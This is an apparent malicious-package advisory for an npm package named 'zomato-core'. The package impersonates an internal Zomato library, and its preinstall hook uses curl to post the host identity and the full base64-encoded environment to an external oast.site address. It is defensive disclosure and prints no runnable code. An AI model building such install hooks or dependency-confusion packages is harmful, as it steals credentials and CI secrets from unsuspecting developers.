MAL-2026-6268

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5) package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the entire base64-encoded process environment to http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/<base64-package-name> over plaintext HTTP. This fires automatically on `npm install` with no user opt-in, leaking host identity and any secrets present in environment variables (CI tokens, AWS/GCP credentials, npm publish tokens, etc.). The package has no functional content — index.js is a one-line stub exporting `{ name: 'zomato-core', version: '1.0.0' }` — so the package exists solely as the exfiltration vehicle. The name and description impersonate an internal Zomato namespace (`zomato-core`, described as 'Zomato core utility library', repository `github.com/zomato/zomato-core`), consistent with a dependency-confusion attack against Zomato engineers and CI whose private internal `zomato-core` may resolve to this public registry copy.